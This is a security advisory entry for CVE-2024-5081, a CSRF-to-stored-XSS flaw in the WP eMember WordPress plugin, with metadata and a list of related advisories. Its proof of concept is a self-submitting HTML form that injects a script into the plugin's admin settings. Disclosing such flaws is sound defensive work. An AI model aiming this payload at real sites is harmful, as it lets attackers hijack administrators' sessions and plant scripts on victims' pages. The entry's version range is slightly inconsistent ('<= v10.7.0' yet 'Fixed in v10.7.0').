WP eMember <= v10.7.0 – Stored XSS via CSRF | CVE 2024-5081 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack

Proof of Concept

Make a logged in admin open the following HTML file:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=eMember_settings_menu&tab=2" method="POST">
        <input type="text" name="eMember_email_body" value='</textarea><script>alert(2)</script>'>
        <input type="text" name="info_update" value="true">
        <input type="text" name="update_advanced_settings" value="Update options »">
        <input type="submit" value="submit">
    </form>
</body>
```

Note: Other fields are also vulnerable.

Affects Plugins

Fixed in v10.7.0

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

4f02bdb5-5cf6-4519-9586-fd4fb3d45dea

Timeline

Publicly Published

2024-07-15 (about 1 year ago)

Added

2024-07-15 (about 1 year ago)

Last Updated

2024-07-15 (about 1 year ago)

Other

Published

Title

Published

2025-01-16

Title

Quote me <= 1.0 - Reflected Cross-Site Scripting

Published

2024-10-24

Title

Beaver Builder < 2.8.3.9 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-06-24

Title

WP eStore < 8.5.5 - Reflected XSS in Category Editing

Published

2024-08-29

Title

Posterity <= 3.8 - Contributor+ Stored XSS

Published

2024-05-22

Title

Hash Elements < 1.3.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via url Parameter in Multiple Widgets